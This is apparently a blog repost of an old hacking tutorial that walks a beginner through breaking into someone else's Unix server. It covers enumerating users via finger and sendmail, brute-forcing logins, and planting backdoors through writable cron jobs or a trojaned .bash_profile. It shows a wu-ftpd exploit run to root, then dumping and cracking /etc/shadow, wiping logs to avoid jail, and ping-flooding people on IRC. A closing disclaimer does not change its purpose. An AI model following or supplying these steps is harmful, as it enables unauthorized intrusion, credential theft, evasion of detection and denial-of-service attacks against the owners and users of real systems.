SUPPLIES
==========
(2.) Here listed is some supplies you will need throughout this tutorial, they can be obtained
easily,
1. - superscan (for windows)
2. - nmap (for unix)
3. - full shell access (the very best is if you have linux or bsd or solaris or another unix OS)
4. - compiler on the shell
5. - wingates (you can use them as telnet proxys)
That is it!
------------------------------------------------------------------------------------------------------
TO GET IN
============
(4.) To get in you will need to gather as much info on this host as you can, make sure it is
a dumb SysAdmin, since this is your first hack. Then exploit the System, I will explain more
on this and info getting later.
-------------------------------------------------------------------------------------------------
ENUMERATION
=============
(5,> Ok we have our target. Now to go further we need some info. First telnet to it's port 79, now
if this is open you can possibly gain a user list of who is logged on.Just telnet in and press enter.
Lets say it is enabled
and allows you to view online users. Look at the example below-
-----------------------------------------------------------------------------
$ telnet target.domain 79
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
Login Name Tty Idle Login Time Office Office Phone
gt grahm crackhead /1 Sep 1 12:01
-----------------------------------------------------------------------------
Ok if you get a login write it down
and try various logins for it. Maybe get Brutus, a telnet brute forcer which you can download for
windows at- www.packetstorm.securify.com. Use that, try many wordlists. If you just got a
"no one is logged on"
message than perhaps you should get "haktek" for windows, you can also get that at-
www.packetstorm.securify.com. Haktek will let you monitor the finger daemon for as long as you want
and log to a file everyone who logs in. This can be usefull. Another way is to use the sendmail.
If they have a lot of users try telneting in and trying to find some valid names, maybe even try
brute forcing it with a program or a shell script you could type up. Look below, I give an example
of a sendmail vulnerable to gathering valid logins-
-----------------------------------------------------------------------------
$ telnet target.domain 25
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
220 target.domain ESMTP Sendmail 8.9.3/8.9.3; Fri, 1 Sep 2000 12:11:00 -0400
expn wally
250 Wally Kolcun
vrfy wally
250 Wally Kolcun
expn Billy
550 BIlly... User Unknown
----------------------------------------------------------------------------
As you see above I telneted to their smtp daemon, issued "expn
real user, then at the end I showed an example of what would happen if the user did not exist, when I
typed "expn Billy" it showed the user was unknown so it was not a valid login, this also helps you get
their email address when you would do some social engineering.
Another way of gathering usernames would be to search usenet, altavista, for that specific domain.
If you search newsgroups for the domain, there may be some useful info on it, like a problem they are having
maybe with setting permissions, which could get you in possibly.
Other daemons to help you could be systat, netstat...
Telnet can also help you figure out the OS, which can be important if you want to exploit it, some have the
OS printed in the telnet login, like below:
----------------------------------------------------------------------------
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
Red Hat Linux release 6.1 (Cartman)
Kernal 2.2.12-20 on an i586
login:
.----------------------------------------------------------------------------
As you can see above the system we are cracking now is a redhat 6.1 box
Social engineering can also get you somewhere, take the example of Kevin Mitnick, He used social engineering
to get into Novell, a HUGE system. What he did was talked like he knew someone who was working there. He
knew they were at vacation at the time, but he had their name. He called up Novell's offices and asked for
the person, the secretary said she was on vacation, so he said he needed to get access from her, he was
supposed to have. She gave him info that got him in.
----------------------------------------------------------------------------------------------------------
COMMON FLAWS
===============
(6.) Sometimes people make mistakes. This can get you in. Some people just aren't good sysadmins. A very
common flaw is people having trouble setting permissions, some have so much trouble they set things
writable to everyone. This can be trouble. Lets have an example here. Someone sets the cron.daily
writable for everyone. You could just upload somebackdoor and have it executed by the cron daemon which
would escalate your access to the system.
Now I will tell you about the most terrible thing to do. If a user ever uses IRC on the system, and
if they also had dcc file send on autoexcept, also having the files go to their home directory, they
could be sent a hacked up .bash_profile, if written correctly this could make them do something not
wanted. Like adding a user when they logged in, or mailing someone a login/pass. This is absolutely
the easiest way to get in.
---------------------------------------------------------------------------------------------------------
BUFFER OVERFLOWS/EXPLOITING
================================
(7.) I am not going into buffer overflows too deep. I will just explain what they are so you understand
and go into the next section.
BUFFER OVERFLOWS- On daemons there is a thing called a buffer limit. The buffer limit limits the
================== amount of bytes that come in. Sometimes by issuing specific code you ca overflow
the buffer and spawn a root shell or regular user shell. An example of this is
the recent Buffer overflow in wu-ftpd 2.6.0 (1). Below I will show you it-
------------------------------------------------------------------------------
$ gcc wuftpd-god.c -o wuftpd-god
$ ./wuftpd-god -h
Usage: ./wuftpd-god -t
[-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]
target : host with any wuftpd
user : anonymous user
dir : if not anonymous user, you need to have writable directory
magic_str : magic string (see exploit description)
-g : enables magic string digging
-x : enables test mode
pass_addr : pointer to setproctitle argument
ret_addr : this is pointer to shellcode
systypes:
0 - RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
1 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm
2 - SuSe 6.3 with wuftpd 2.6.0(1) from rpm
3 - SuSe 6.4 with wuftpd 2.6.0(1) from rpm
4 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)
5 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports
* 6 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages
7 - FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports
8 - FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages
$ ./wuftpd-god -s0 -t target.domain
Target: target.domain (ftp/
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
[32mUSER ftp
[0m331 Guest login ok, send your complete e-mail address as password.
[32mPASS
[0m230-Next time please use your e-mail address as your password
230- for example: joe@cc456375-b.abdn1.md.home.com
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
Linux melmac 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
#
-------------------------------------------------------------------------------
If you want root generally an exploit is the way. Find the OS of the system
then visit hack.co.za or packetstorm and search for that os, exploit and you
should get some perl scripts/c scripts/shell scripts. Then just execute them
as directed and you should have root.
-------------------------------------------------------------------------------
Already got a root shell, that was pretty easy. Just 3 commands to compile get help
and execute, a lot of times I think it is too easy.
Ok, in some places you might want to know the actual root password in case they patch the exploit.
so lets say you have a root shell. Issue the command as below-
(it is /etc/passwd if they did not install shadowing utils)
---------------------------------------------------------------
# cat /etc/shadow > /root/passwd
root:34jk3h4jh3.,;8363:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
sympa:x:89:89:Sympa Mailing list manager:/home/sympa:/bin/bash
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:103:X Font Server:/etc/X11/fs:/bin/false
fax:x:10:14:Fax Master:/home/fax/:/bin/bash
postfix:x:101:233:postfix:/var/spool/postfix:
gdm:x:42:235::/home/gdm:/bin/bash
grim:9hu.u8:501:501:grim:/home/grim:/bin/bash
banal:x:102:236:BANAL Administrator:/home/banal:/bin/bash
bleeb:36.34/363;86:502:506::/home/bleeb:/bin/bash
---------------------------------------------------------------
The above command saved it as /root/passwd, but then you must crack it. Use john the ripper,
it can be found at packetstorm and other places, I use it, it is so fast. Sometimes it takes years
to crack a password so I don't suggest relying on cracking
---------------------------------------------------------------------------------------------------------
FIREWALLS
===========
(8.) Firewalls can't stop you if you know what you are doing. In this text I use nmap a lot, it is good
for just about everything, nmap is short for network mapper. The newest version can be downloaded
from www.insecure.org I love it's OS detection, it is so accurate, even wehn little services are
running, it analyzes the tcp fingerprint, which it has a large database of. Ok enough on the greatness
here is a simple option on nmap you can use to find the rules for firewalls. Issue "nmap -sA" . This
Will check the firewalls rules. I don't want to go to deep into it to make this text extremely more
boring than it is. If you would like to know more on this flag for nmap (a - in front of a option
is a flag) just do "man nmap" at the shell prompt.
---------------------------------------------------------------------------------------------------------
WHAT TO DO AFTER GETTING IN
==============================
(9.) What to do after you get in depends on how you are going to use the system, if you want to use it
to have an anonymous root shell then set up a backdoor. You can get backdoor's (trojans) at
www.packetstorm.securify.com. I think you should be able to set up a backdoor on your own, but
if for some reason you need help join #r00t-access on Dalnet and I can get you through but I will
NOT crack into the systems for you, but I can help out occasionally if you need to secure your system...
---------------------------------------------------------------------------------------------------------
HOW TO NOT GET CAUGHT
=======================
(10.) Main thing is, DON'T be STUPID. If you want to keep the remote shell, don't deface the site, don't
delete their files, try to leave the system as it was and delete the neccessary logs to do so, that
is all I have to say on this section.
---------------------------------------------------------------------------------------------------------
LOG CLEANING
================
(11.) Log cleaning is the most important part of staying there and not going to jail. Rid your login/hostname
from logs, which on Linux are held in /var/log, and .bash_profile in your directory. The easiest way
to do this is to use a log cleaner which you can get from blackcode.com or packetstorm.
---------------------------------------------------------------------------------------------------------
FINDING A USE
===============
(12.) I always have at least one rooted shell on me. I set up nmap and saint on them to hide my hostname,
maybe run a web proxy/bnc on it. Saint is a great tool, it can tell you what a system is vulnerable
to and can run remotely in your webbrowser with ease. Sometimes when people piss me off I decide to use
a couple boxes and flood em'. like this-
----------------------------------------------------------------
# ping -f -c 50 -s 4500 IPaddress
.........................................................
...........................................................
.........E...........E...EE........E..................E.......
..............E.......E.EEE...................E.E......
Host unreatchable.
----------------------------------------------------------------
People consider it lame but sometimes i want certain people to just shutup on IRC so I flood them.
---------------------------------------------------------------------------------------------------------
THE BAD HACKER
===================
(13.) In this text I have not been talking of hacking, in fact it is refered to as cracking. I don't mess
up and systems and probably never will, not because I can't but because it is not right, plus if you got
caught you would get more jail time for damage charges. I dislike people into totalling things.
No comments:
Post a Comment